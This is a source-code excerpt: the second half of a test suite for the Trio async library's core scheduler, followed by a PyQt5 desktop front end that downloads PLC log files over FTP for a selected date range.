except _core.RunFinishedError:
record.append(("run finished", i))
async def main():
nonlocal token
token = _core.current_trio_token()
token.run_sync_soon(naughty_cb, 0)
record.append("starting")
for _ in range(20):
await _core.checkpoint()
_core.run(main)
assert len(record) == 2
assert record[0] == "starting"
assert record[1][0] == "run finished"
assert record[1][1] >= 19
def test_TrioToken_run_sync_soon_threaded_stress_test():
cb_counter = 0
def cb():
nonlocal cb_counter
cb_counter += 1
def stress_thread(token):
try:
while True:
token.run_sync_soon(cb)
time.sleep(0)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=stress_thread, args=(token,))
thread.start()
for _ in range(10):
start_value = cb_counter
while cb_counter == start_value:
await sleep(0.01)
_core.run(main)
print(cb_counter)
async def test_TrioToken_run_sync_soon_massive_queue():
# There are edge cases in the wakeup fd code when the wakeup fd overflows,
# so let's try to make that happen. This is also just a good stress test
# in general. (With the current-as-of-2017-02-14 code using a socketpair
# with minimal buffer, Linux takes 6 wakeups to fill the buffer and macOS
# takes 1 wakeup. So 1000 is overkill if anything. Windows OTOH takes
# ~600,000 wakeups, but has the same code paths...)
COUNT = 1000
token = _core.current_trio_token()
counter = [0]
def cb(i):
# This also tests FIFO ordering of callbacks
assert counter[0] == i
counter[0] += 1
for i in range(COUNT):
token.run_sync_soon(cb, i)
await wait_all_tasks_blocked()
assert counter[0] == COUNT
@pytest.mark.skipif(buggy_pypy_asyncgens, reason="PyPy 7.2 is buggy")
def test_TrioToken_run_sync_soon_late_crash():
# Crash after system nursery is closed -- easiest way to do that is
# from an async generator finalizer.
record = []
saved = []
async def agen():
token = _core.current_trio_token()
try:
yield 1
finally:
token.run_sync_soon(lambda: {}["nope"])
token.run_sync_soon(lambda: record.append("2nd ran"))
async def main():
saved.append(agen())
await saved[-1].asend(None)
record.append("main exiting")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == ["main exiting", "2nd ran"]
async def test_slow_abort_basic():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
await _core.wait_task_rescheduled(slow_abort)
async def test_slow_abort_edge_cases():
record = []
async def slow_aborter():
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
record.append("abort-called")
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
with pytest.raises(_core.Cancelled):
record.append("sleeping")
await _core.wait_task_rescheduled(slow_abort)
record.append("cancelled")
# blocking again, this time it's okay, because we're shielded
await _core.checkpoint()
record.append("done")
with _core.CancelScope() as outer1:
with _core.CancelScope() as outer2:
async with _core.open_nursery() as nursery:
# So we have a task blocked on an operation that can't be
# aborted immediately
nursery.start_soon(slow_aborter)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# And then we cancel it, so the abort callback gets run
outer1.cancel()
assert record == ["sleeping", "abort-called"]
# In fact that happens twice! (This used to cause the abort
# callback to be run twice)
outer2.cancel()
assert record == ["sleeping", "abort-called"]
# But then before the abort finishes, the task gets shielded!
nursery.cancel_scope.shield = True
# Now we wait for the task to finish...
# The cancellation was delivered, even though it was shielded
assert record == ["sleeping", "abort-called", "cancelled", "done"]
async def test_task_tree_introspection():
tasks = {}
nurseries = {}
async def parent(task_status=_core.TASK_STATUS_IGNORED):
tasks["parent"] = _core.current_task()
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery1:
async with _core.open_nursery() as nursery2:
assert tasks["parent"].child_nurseries == [nursery1, nursery2]
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery:
nurseries["parent"] = nursery
await nursery.start(child1)
# Upward links survive after tasks/nurseries exit
assert nurseries["parent"].parent_task is tasks["parent"]
assert tasks["child1"].parent_nursery is nurseries["parent"]
assert nurseries["child1"].parent_task is tasks["child1"]
assert tasks["child2"].parent_nursery is nurseries["child1"]
nursery = _core.current_task().parent_nursery
# Make sure that chaining eventually gives a nursery of None (and not,
# for example, an error)
while nursery is not None:
t = nursery.parent_task
nursery = t.parent_nursery
async def child2():
tasks["child2"] = _core.current_task()
assert tasks["parent"].child_nurseries == [nurseries["parent"]]
assert nurseries["parent"].child_tasks == frozenset({tasks["child1"]})
assert tasks["child1"].child_nurseries == [nurseries["child1"]]
assert nurseries["child1"].child_tasks == frozenset({tasks["child2"]})
assert tasks["child2"].child_nurseries == []
async def child1(task_status=_core.TASK_STATUS_IGNORED):
me = tasks["child1"] = _core.current_task()
assert me.parent_nursery.parent_task is tasks["parent"]
assert me.parent_nursery is not nurseries["parent"]
assert me.eventual_parent_nursery is nurseries["parent"]
task_status.started()
assert me.parent_nursery is nurseries["parent"]
assert me.eventual_parent_nursery is None
# Wait for the start() call to return and close its internal nursery, to
# ensure consistent results in child2:
await _core.wait_all_tasks_blocked()
async with _core.open_nursery() as nursery:
nurseries["child1"] = nursery
nursery.start_soon(child2)
async with _core.open_nursery() as nursery:
nursery.start_soon(parent)
# There are no pending starts, so no one should have a non-None
# eventual_parent_nursery
for task in tasks.values():
assert task.eventual_parent_nursery is None
async def test_nursery_closure():
async def child1(nursery):
# We can add new tasks to the nursery even after entering __aexit__,
# so long as there are still tasks running
nursery.start_soon(child2)
async def child2():
pass
async with _core.open_nursery() as nursery:
nursery.start_soon(child1, nursery)
# But once we've left __aexit__, the nursery is closed
with pytest.raises(RuntimeError):
nursery.start_soon(child2)
async def test_spawn_name():
async def func1(expected):
task = _core.current_task()
assert expected in task.name
async def func2(): # pragma: no cover
pass
async with _core.open_nursery() as nursery:
for spawn_fn in [nursery.start_soon, _core.spawn_system_task]:
spawn_fn(func1, "func1")
spawn_fn(func1, "func2", name=func2)
spawn_fn(func1, "func3", name="func3")
spawn_fn(functools.partial(func1, "func1"))
spawn_fn(func1, "object", name=object())
async def test_current_effective_deadline(mock_clock):
assert _core.current_effective_deadline() == inf
with _core.CancelScope(deadline=5) as scope1:
with _core.CancelScope(deadline=10) as scope2:
assert _core.current_effective_deadline() == 5
scope2.deadline = 3
assert _core.current_effective_deadline() == 3
scope2.deadline = 10
assert _core.current_effective_deadline() == 5
scope2.shield = True
assert _core.current_effective_deadline() == 10
scope2.shield = False
assert _core.current_effective_deadline() == 5
scope1.cancel()
assert _core.current_effective_deadline() == -inf
scope2.shield = True
assert _core.current_effective_deadline() == 10
assert _core.current_effective_deadline() == -inf
assert _core.current_effective_deadline() == inf
def test_nice_error_on_bad_calls_to_run_or_spawn():
def bad_call_run(*args):
_core.run(*args)
def bad_call_spawn(*args):
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(*args)
_core.run(main)
for bad_call in bad_call_run, bad_call_spawn:
async def f(): # pragma: no cover
pass
with pytest.raises(TypeError, match="expecting an async function"):
bad_call(f())
async def async_gen(arg): # pragma: no cover
yield arg
with pytest.raises(
TypeError, match="expected an async function but got an async generator"
):
bad_call(async_gen, 0)
def test_calling_asyncio_function_gives_nice_error():
async def child_xyzzy():
import asyncio
await asyncio.Future()
async def misguided():
await child_xyzzy()
with pytest.raises(TypeError) as excinfo:
_core.run(misguided)
assert "asyncio" in str(excinfo.value)
# The traceback should point to the location of the foreign await
assert any( # pragma: no branch
entry.name == "child_xyzzy" for entry in excinfo.traceback
)
async def test_asyncio_function_inside_nursery_does_not_explode():
# Regression test for https://github.com/python-trio/trio/issues/552
with pytest.raises(TypeError) as excinfo:
async with _core.open_nursery() as nursery:
import asyncio
nursery.start_soon(sleep_forever)
await asyncio.Future()
assert "asyncio" in str(excinfo.value)
async def test_trivial_yields():
with assert_checkpoints():
await _core.checkpoint()
with assert_checkpoints():
await _core.checkpoint_if_cancelled()
await _core.cancel_shielded_checkpoint()
with assert_checkpoints():
async with _core.open_nursery():
pass
with _core.CancelScope() as cancel_scope:
cancel_scope.cancel()
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery():
raise KeyError
assert len(excinfo.value.exceptions) == 2
assert {type(e) for e in excinfo.value.exceptions} == {
KeyError,
_core.Cancelled,
}
async def test_nursery_start(autojump_clock):
async def no_args(): # pragma: no cover
pass
# Errors in calling convention get raised immediately from start
async with _core.open_nursery() as nursery:
with pytest.raises(TypeError):
await nursery.start(no_args)
async def sleep_then_start(seconds, *, task_status=_core.TASK_STATUS_IGNORED):
repr(task_status) # smoke test
await sleep(seconds)
task_status.started(seconds)
await sleep(seconds)
# Basic happy-path check: start waits for the task to call started(), then
# returns, passes back the value, and the given nursery then waits for it
# to exit.
for seconds in [1, 2]:
async with _core.open_nursery() as nursery:
assert len(nursery.child_tasks) == 0
t0 = _core.current_time()
assert await nursery.start(sleep_then_start, seconds) == seconds
assert _core.current_time() - t0 == seconds
assert len(nursery.child_tasks) == 1
assert _core.current_time() - t0 == 2 * seconds
# Make sure TASK_STATUS_IGNORED works so task function can be called
# directly
t0 = _core.current_time()
await sleep_then_start(3)
assert _core.current_time() - t0 == 2 * 3
# calling started twice
async def double_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
with pytest.raises(RuntimeError):
task_status.started()
async with _core.open_nursery() as nursery:
await nursery.start(double_started)
# child crashes before calling started -> error comes out of .start()
async def raise_keyerror(task_status=_core.TASK_STATUS_IGNORED):
raise KeyError("oops")
async with _core.open_nursery() as nursery:
with pytest.raises(KeyError):
await nursery.start(raise_keyerror)
# child exiting cleanly before calling started -> triggers a RuntimeError
async def nothing(task_status=_core.TASK_STATUS_IGNORED):
return
async with _core.open_nursery() as nursery:
with pytest.raises(RuntimeError) as excinfo:
await nursery.start(nothing)
assert "exited without calling" in str(excinfo.value)
# if the call to start() is cancelled, then the call to started() does
# nothing -- the child keeps executing under start(). The value it passed
# is ignored; start() raises Cancelled.
async def just_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started("hi")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.Cancelled):
await nursery.start(just_started)
# and if after the no-op started(), the child crashes, the error comes out
# of start()
async def raise_keyerror_after_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
raise KeyError("whoopsiedaisy")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.MultiError) as excinfo:
await nursery.start(raise_keyerror_after_started)
assert {type(e) for e in excinfo.value.exceptions} == {
_core.Cancelled,
KeyError,
}
# trying to start in a closed nursery raises an error immediately
async with _core.open_nursery() as closed_nursery:
pass
t0 = _core.current_time()
with pytest.raises(RuntimeError):
await closed_nursery.start(sleep_then_start, 7)
assert _core.current_time() == t0
async def test_task_nursery_stack():
task = _core.current_task()
assert task._child_nurseries == []
async with _core.open_nursery() as nursery1:
assert task._child_nurseries == [nursery1]
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery2:
assert task._child_nurseries == [nursery1, nursery2]
raise KeyError
assert task._child_nurseries == [nursery1]
assert task._child_nurseries == []
async def test_nursery_start_with_cancelled_nursery():
# This function isn't testing task_status, it's using task_status as a
# convenient way to get a nursery that we can test spawning stuff into.
async def setup_nursery(task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
task_status.started(nursery)
await sleep_forever()
# Calls started() while children are asleep, so we can make sure
# that the cancellation machinery notices and aborts when a sleeping task
# is moved into a cancelled scope.
async def sleeping_children(fn, *, task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_forever)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
fn()
task_status.started()
# Cancelling the setup_nursery just *before* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(
sleeping_children, target_nursery.cancel_scope.cancel
)
# Cancelling the setup_nursery just *after* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(sleeping_children, lambda: None)
target_nursery.cancel_scope.cancel()
async def test_nursery_start_keeps_nursery_open(autojump_clock):
async def sleep_a_bit(task_status=_core.TASK_STATUS_IGNORED):
await sleep(2)
task_status.started()
await sleep(3)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
# Start the 'start' call running in the background
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Sleep a bit
await sleep(1)
# Start another one.
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Then exit this nursery. At this point, there are no tasks
# present in this nursery -- the only thing keeping it open is
# that the tasks will be placed into it soon, when they call
# started().
assert _core.current_time() - t0 == 6
# Check that it still works even if the task that the nursery is waiting
# for ends up crashing, and never actually enters the nursery.
async def sleep_then_crash(task_status=_core.TASK_STATUS_IGNORED):
await sleep(7)
raise KeyError
async def start_sleep_then_crash(nursery):
with pytest.raises(KeyError):
await nursery.start(sleep_then_crash)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
nursery1.start_soon(start_sleep_then_crash, nursery2)
await wait_all_tasks_blocked()
assert _core.current_time() - t0 == 7
async def test_nursery_explicit_exception():
with pytest.raises(KeyError):
async with _core.open_nursery():
raise KeyError()
async def test_nursery_stop_iteration():
async def fail():
raise ValueError
try:
async with _core.open_nursery() as nursery:
nursery.start_soon(fail)
raise StopIteration
except _core.MultiError as e:
assert tuple(map(type, e.exceptions)) == (StopIteration, ValueError)
async def test_nursery_stop_async_iteration():
class it:
def __init__(self, count):
self.count = count
self.val = 0
async def __anext__(self):
await sleep(0)
val = self.val
if val >= self.count:
raise StopAsyncIteration
self.val += 1
return val
class async_zip:
def __init__(self, *largs):
self.nexts = [obj.__anext__ for obj in largs]
async def _accumulate(self, f, items, i):
items[i] = await f()
def __aiter__(self):
return self
async def __anext__(self):
nexts = self.nexts
items = [None] * len(nexts)
got_stop = False
def handle(exc):
nonlocal got_stop
if isinstance(exc, StopAsyncIteration):
got_stop = True
return None
else: # pragma: no cover
return exc
with _core.MultiError.catch(handle):
async with _core.open_nursery() as nursery:
for i, f in enumerate(nexts):
nursery.start_soon(self._accumulate, f, items, i)
if got_stop:
raise StopAsyncIteration
return items
result = []
async for vals in async_zip(it(4), it(2)):
result.append(vals)
assert result == [[0, 0], [1, 1]]
async def test_traceback_frame_removal():
async def my_child_task():
raise KeyError()
try:
# Trick: For now cancel/nursery scopes still leave a bunch of tb gunk
# behind. But if there's a MultiError, they leave it on the MultiError,
# which lets us get a clean look at the KeyError itself. Someday I
# guess this will always be a MultiError (#611), but for now we can
# force it by raising two exceptions.
async with _core.open_nursery() as nursery:
nursery.start_soon(my_child_task)
nursery.start_soon(my_child_task)
except _core.MultiError as exc:
first_exc = exc.exceptions[0]
assert isinstance(first_exc, KeyError)
# The top frame in the exception traceback should be inside the child
# task, not trio/contextvars internals. And there's only one frame
# inside the child task, so this will also detect if our frame-removal
# is too eager.
frame = first_exc.__traceback__.tb_frame
assert frame.f_code is my_child_task.__code__
def test_contextvar_support():
var = contextvars.ContextVar("test")
var.set("before")
assert var.get() == "before"
async def inner():
task = _core.current_task()
assert task.context.get(var) == "before"
assert var.get() == "before"
var.set("after")
assert var.get() == "after"
assert var in task.context
assert task.context.get(var) == "after"
_core.run(inner)
assert var.get() == "before"
async def test_contextvar_multitask():
var = contextvars.ContextVar("test", default="hmmm")
async def t1():
assert var.get() == "hmmm"
var.set("hmmmm")
assert var.get() == "hmmmm"
async def t2():
assert var.get() == "hmmmm"
async with _core.open_nursery() as n:
n.start_soon(t1)
await wait_all_tasks_blocked()
assert var.get() == "hmmm"
var.set("hmmmm")
n.start_soon(t2)
await wait_all_tasks_blocked()
def test_system_task_contexts():
cvar = contextvars.ContextVar("qwilfish")
cvar.set("water")
async def system_task():
assert cvar.get() == "water"
async def regular_task():
assert cvar.get() == "poison"
async def inner():
async with _core.open_nursery() as nursery:
cvar.set("poison")
nursery.start_soon(regular_task)
_core.spawn_system_task(system_task)
await wait_all_tasks_blocked()
_core.run(inner)
def test_Nursery_init():
with pytest.raises(TypeError):
_core._run.Nursery(None, None)
async def test_Nursery_private_init():
# context manager creation should not raise
async with _core.open_nursery() as nursery:
assert False == nursery._closed
def test_Nursery_subclass():
with pytest.raises(TypeError):
class Subclass(_core._run.Nursery):
pass
def test_Cancelled_init():
with pytest.raises(TypeError):
raise _core.Cancelled
with pytest.raises(TypeError):
_core.Cancelled()
# private constructor should not raise
_core.Cancelled._create()
def test_Cancelled_str():
cancelled = _core.Cancelled._create()
assert str(cancelled) == "Cancelled"
def test_Cancelled_subclass():
with pytest.raises(TypeError):
class Subclass(_core.Cancelled):
pass
def test_CancelScope_subclass():
with pytest.raises(TypeError):
class Subclass(_core.CancelScope):
pass
def test_sniffio_integration():
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def check_inside_trio():
assert sniffio.current_async_library() == "trio"
_core.run(check_inside_trio)
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def test_Task_custom_sleep_data():
task = _core.current_task()
assert task.custom_sleep_data is None
task.custom_sleep_data = 1
assert task.custom_sleep_data == 1
await _core.checkpoint()
assert task.custom_sleep_data is None
@types.coroutine
def async_yield(value):
yield value
async def test_permanently_detach_coroutine_object():
task = None
pdco_outcome = None
async def detachable_coroutine(task_outcome, yield_value):
await sleep(0)
nonlocal task, pdco_outcome
task = _core.current_task()
pdco_outcome = await outcome.acapture(
_core.permanently_detach_coroutine_object, task_outcome
)
await async_yield(yield_value)
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Value(None), "I'm free!")
# If we get here then Trio thinks the task has exited... but the coroutine
# is still iterable
assert pdco_outcome is None
assert task.coro.send("be free!") == "I'm free!"
assert pdco_outcome == outcome.Value("be free!")
with pytest.raises(StopIteration):
task.coro.send(None)
# Check the exception paths too
task = None
pdco_outcome = None
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Error(KeyError()), "uh oh")
throw_in = ValueError()
assert task.coro.throw(throw_in) == "uh oh"
assert pdco_outcome == outcome.Error(throw_in)
with pytest.raises(StopIteration):
task.coro.send(None)
async def bad_detach():
async with _core.open_nursery():
with pytest.raises(RuntimeError) as excinfo:
await _core.permanently_detach_coroutine_object(outcome.Value(None))
assert "open nurser" in str(excinfo.value)
async with _core.open_nursery() as nursery:
nursery.start_soon(bad_detach)
async def test_detach_and_reattach_coroutine_object():
unrelated_task = None
task = None
async def unrelated_coroutine():
nonlocal unrelated_task
unrelated_task = _core.current_task()
async def reattachable_coroutine():
await sleep(0)
nonlocal task
task = _core.current_task()
def abort_fn(_): # pragma: no cover
return _core.Abort.FAILED
got = await _core.temporarily_detach_coroutine_object(abort_fn)
assert got == "not trio!"
await async_yield(1)
await async_yield(2)
with pytest.raises(RuntimeError) as excinfo:
await _core.reattach_detached_coroutine_object(unrelated_task, None)
assert "does not match" in str(excinfo.value)
await _core.reattach_detached_coroutine_object(task, "byebye")
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(unrelated_coroutine)
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert unrelated_task is not None
assert task is not None
# Okay, it's detached. Here's our coroutine runner:
assert task.coro.send("not trio!") == 1
assert task.coro.send(None) == 2
assert task.coro.send(None) == "byebye"
# Now it's been reattached, and we can leave the nursery
async def test_detached_coroutine_cancellation():
abort_fn_called = False
task = None
async def reattachable_coroutine():
await sleep(0)
nonlocal task
task = _core.current_task()
def abort_fn(_):
nonlocal abort_fn_called
abort_fn_called = True
return _core.Abort.FAILED
await _core.temporarily_detach_coroutine_object(abort_fn)
await _core.reattach_detached_coroutine_object(task, None)
with pytest.raises(_core.Cancelled):
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert task is not None
nursery.cancel_scope.cancel()
task.coro.send(None)
assert abort_fn_called
def test_async_function_implemented_in_C():
# These used to crash because we'd try to mutate the coroutine object's
# cr_frame, but C functions don't have Python frames.
async def agen_fn(record):
assert not _core.currently_ki_protected()
record.append("the generator ran")
yield
run_record = []
agen = agen_fn(run_record)
_core.run(agen.__anext__)
assert run_record == ["the generator ran"]
async def main():
start_soon_record = []
agen = agen_fn(start_soon_record)
async with _core.open_nursery() as nursery:
nursery.start_soon(agen.__anext__)
assert start_soon_record == ["the generator ran"]
_core.run(main)
async def test_very_deep_cancel_scope_nesting():
# This used to crash with a RecursionError in CancelStatus.recalculate
with ExitStack() as exit_stack:
outermost_scope = _core.CancelScope()
exit_stack.enter_context(outermost_scope)
for _ in range(5000):
exit_stack.enter_context(_core.CancelScope())
outermost_scope.cancel()
async def test_cancel_scope_deadline_duplicates():
# This exercises an assert in Deadlines._prune, by intentionally creating
# duplicate entries in the deadline heap.
now = _core.current_time()
with _core.CancelScope() as cscope:
for _ in range(DEADLINE_HEAP_MIN_PRUNE_THRESHOLD * 2):
cscope.deadline = now + 9998
cscope.deadline = now + 9999
await sleep(0.01)
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_simple_cancel_scope_usage_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770
gc.collect()
async def do_a_cancel():
with _core.CancelScope() as cscope:
cscope.cancel()
await sleep_forever()
old_flags = gc.get_debug()
try:
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
await do_a_cancel()
await do_a_cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(do_a_cancel)
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_nursery_cancel_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770#issuecomment-730229423
gc.collect()
old_flags = gc.get_debug()
try:
for i in range(3):
async with _core.open_nursery() as nursery:
gc.collect()
gc.set_debug(gc.DEBUG_LEAK)
nursery.cancel_scope.cancel()
gc.collect()
gc.set_debug(0)
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
|
main_frontend.py
|
import datetime
import ftplib
import os
import sys
from threading import Thread
from typing import List
import logging
from PyQt5.QtCore import QDate, pyqtSignal, QObject
from PyQt5.QtWidgets import QApplication, QMainWindow, QCheckBox, QMessageBox, QWidget, QVBoxLayout
from SPSLib import SPSLib, SPSConnectionException
from frontend.ConfigManager import ConfigManager
from frontend.mainwindow import Ui_MainWindow
config_file_path = '../User/collection.conf'.replace('~', 'c:\\Users\\' + os.getlogin())
class Main(QObject):
window = None
ui = None
config = None
checkBoxes: List[QCheckBox] = []
showDialogSignal = pyqtSignal(str, str)
## Constructor
# Loads configuration and initializes superclass
def __init__(self):
super(Main, self).__init__()
self.ui = None
self.config = ConfigManager(config_file_path)
logging.basicConfig(filename=self.config.log_path, level=logging.INFO,
format='%(asctime)s: %(levelname)s : %(message)s')
logging.info("Starting...")
## Helper for creating a SPS object. Uses default username, password and settings
# @param host the hostname (or IP address) of the SPS to be connected to
# @return the SPS object
def SPSFactory(self, host):
return SPSLib(host, self.config.SPSuser, self.config.SPSpassword, numretries=3,
retrydelay=1,
default_destination=self.config.downloaddestination) # Create an SPS client that will try to connect 3 times waiting 1 second on each failed attempt
## Opens the configuration in Notepad so the user can edit it.
def open_conf_file(self):
# Thread(target=os.system, args=("notepad " + config_file_path,)).start()
os.system("notepad " + config_file_path)
QMessageBox.about(self.window, "Notice", "Please Restart The Program For Changes To Take Effect")
def open_log_file(self):
Thread(target=os.system, args=("notepad " + self.config.log_path,)).start()
# os.system("notepad " + config_file_path)
# QMessageBox.about(self.window, "Notice", "Please Restart The Program For Changes To Take Effect")
## Reloads the configuration file
# Not yet implemented
def reload_conf_file(self):
pass
## Installs the cron job on the users PC
# Not yet implemented
def install_scheduled_task(self):
pass # TODO Implement this...
## Threaded option for download for day
def threadDownloadForDay(self):
Thread(target=self.downloadFilesForDay).start()
## Threaded option for download for month
def threadDownloadForMonth(self):
Thread(target=self.downloadFilesForMonth).start()
## Threaded option for download for year
def threadDownloadForYear(self):
Thread(target=self.downloadFilesForYear).start()
## Threaded function tied to a signal for showing a dialog with the given informaiton
# @param title The title of the dialog
# @param message The message of the dialog
def showDialog(self, title, message):
QMessageBox.about(self.window, title, message)
## Download all files for a given day
def downloadFilesForDay(self):
logging.info("Initiated Download For Day")
selected_hosts = self.getSelectedHosts()
if len(selected_hosts) is 0:
self.showDialogSignal.emit("Error!", "No PLC Selected")
return
self.setProgressBarEnabled(True)
self.setAllButtonsEnabled(False)
for host in selected_hosts:
try:
sps = self.SPSFactory(host)
qdate = self.ui.daySelector.date()
dt = datetime.date(qdate.year(), qdate.month(), qdate.day())
sps.download_files_for_day(dt)
except SPSConnectionException:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!", "Error Connecting To SPS With Address " + host)
logging.error("Error Connecting To SPS With Address " + host)
self.setProgressBarEnabled(True)
except ftplib.all_errors:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!",
"An FTP Error Occurred Communicating With SPS With Address " + host + ". Make Sure The Files You Are Looking For Exist")
logging.error("An Unknown Error Occurred Communicating With SPS With Address " + host)
self.setProgressBarEnabled(True)
self.showDialogSignal.emit("Done!", "Download Process Is Complete")
logging.info("Download Process Is Complete")
self.setProgressBarEnabled(False)
self.setAllButtonsEnabled(True)
## Download all files for a given month
def downloadFilesForMonth(self):
logging.info("Initiated Download For Month")
selected_hosts = self.getSelectedHosts()
if len(selected_hosts) is 0:
self.showDialogSignal.emit("Error!", "No PLC Selected")
return
self.setProgressBarEnabled(True)
self.setAllButtonsEnabled(False)
for host in selected_hosts:
try:
sps = self.SPSFactory(host)
qdate = self.ui.monthSelector.date()
dt = datetime.date(qdate.year(), qdate.month(), qdate.day())
sps.download_files_for_month(dt)
except SPSConnectionException:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!", "Error Connecting To SPS With Address " + host)
logging.error("Error Connecting To SPS With Address " + host)
self.setProgressBarEnabled(True)
except ftplib.all_errors:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!",
"An FTP Error Occurred Communicating With SPS With Address " + host + ". Make Sure The Files You Are Looking For Exist")
logging.error("An Unknown Error Occurred Communicating With SPS With Address " + host)
self.setProgressBarEnabled(True)
self.showDialogSignal.emit("Done!", "Download Process Is Complete")
logging.info("Download Process Is Complete")
self.setProgressBarEnabled(False)
self.setAllButtonsEnabled(True)
## Download all files for a given year
def downloadFilesForYear(self):
logging.info("Initiated Download For Year")
selected_hosts = self.getSelectedHosts()
if len(selected_hosts) is 0:
self.showDialogSignal.emit("Error!", "No PLC Selected")
return
self.setProgressBarEnabled(True)
self.setAllButtonsEnabled(False)
for host in selected_hosts:
try:
sps = self.SPSFactory(host)
qdate = self.ui.yearSelector.date()
year = qdate.year()
for i in range(1, 12):
dt = datetime.date(year, i, 1)
try:
sps.download_files_for_month(dt)
except ftplib.all_errors:
continue
except SPSConnectionException:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!", "Error Connecting To SPS With Address " + host)
logging.error("Error Connecting To SPS With Address " + host)
self.setProgressBarEnabled(True)
except:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!",
"An Unknown Error Occurred Communicating With SPS With Address " + host)
logging.error("An Unknown Error Occurred Communicating With SPS With Address " + host)
self.setProgressBarEnabled(True)
self.showDialogSignal.emit("Done!", "Download Process Is Complete")
logging.info("Download Process Is Complete")
self.setProgressBarEnabled(False)
self.setAllButtonsEnabled(True)
## Iterate through the list of checkboxes and get a list of all those selected
# @return An array of strings containing the addresses
def getSelectedHosts(self):
selected_addresses: List[str] = []
for checkBox in self.checkBoxes:
if checkBox.isChecked():
selected_addresses.append(checkBox.text()) # TODO FIXME this is bad
return selected_addresses
## Set all checkboxes' checked values to a given value
# @param selected Boolean to set the checked values to
def setCheckedAllHosts(self, selected: bool):
for checkBox in self.checkBoxes:
checkBox.setChecked(selected)
## Check all the host check boxes
def selectAllHosts(self):
self.setCheckedAllHosts(True)
## Uncheck all the host check boxes
def disselectAllHosts(self):
self.setCheckedAllHosts(False)
## Set the enabled status of the master progress bar. Enabled makes it pulsing and green. Disabled makes it greyed out
# @param enabled the boolean value whether its enabled or not
def setProgressBarEnabled(self, enabled: bool):
if enabled:
self.ui.masterProgressBar.setRange(0, 0)
self.ui.masterProgressBar.setEnabled(True)
else:
self.ui.masterProgressBar.setRange(0, 10)
self.ui.masterProgressBar.setDisabled(True)
## Sets the enabled status of all the buttons that can create a thread. Used to prevent multiple async downloads
# @param enabled the boolean value whether its enabled or not
def setAllButtonsEnabled(self, enabled):
self.ui.pushButtonDownloadForDay.setEnabled(enabled)
self.ui.pushButtonDownloadForMonth.setEnabled(enabled)
self.ui.pushButtonDownloadForYear.setEnabled(enabled)
self.ui.pushButtonDisselectAll.setEnabled(enabled)
self.ui.pushButtonSelectAll.setEnabled(enabled)
for checkbox in self.checkBoxes:
checkbox.setEnabled(enabled)
## Set up the UI elements and do any needed config setup before starting the UI
def setup_ui(self):
logging.debug("Setting Up UI")
self.ui.pushButtonDownloadForDay.clicked.connect(self.threadDownloadForDay)
self.ui.pushButtonDownloadForMonth.clicked.connect(self.threadDownloadForMonth)
self.ui.pushButtonDownloadForYear.clicked.connect(self.threadDownloadForYear)
self.ui.pushButtonSelectAll.clicked.connect(self.selectAllHosts)
self.ui.pushButtonDisselectAll.clicked.connect(self.disselectAllHosts)
self.ui.daySelector.setDate(QDate(datetime.datetime.today()))
